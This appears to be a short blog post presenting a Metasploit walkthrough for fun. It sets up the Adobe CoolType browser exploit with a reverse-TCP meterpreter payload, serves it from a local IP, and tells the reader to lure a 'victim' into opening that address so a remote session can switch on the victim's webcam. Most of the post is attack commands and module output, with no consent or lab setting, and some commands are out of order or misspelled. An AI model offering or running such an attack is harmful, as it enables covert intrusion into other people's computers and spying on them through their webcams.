Wanna have some fun with Metasploit. Open the webcam of your victim and see how is he/she. :P
meterpreter> run webcam
msf> show exploits
msf>use windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > show options
Module options (exploit/windows/browser/adobe_cooltype_sing):
Name
Current Setting Required
Description
----
---------------
-------- -----------
SRVHOST 0.0.0.0
yes The local host to listen on. This must be
an address on the local machine or 0.0.0.0
SRVPORT 8080
yes The local port to listen on.
SSL
false
no
Negotiate SSL for incoming connections
SSLCert
no
Path to a custom SSL certificate (default is randomly
generated)
SSLVersion SSL3
no Specify the version of SSL that
should be used (accepted: SSL2, SSL3, TLS1)
URIPATH
no
The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes
Exit technique: seh, thread, process, none
LHOST
yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) >exploit -j
Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.
msf exploit(adobe_cooltype_sing) > session -i 1
and you will get the webcam of victim. :)
0 comments:
Post a Comment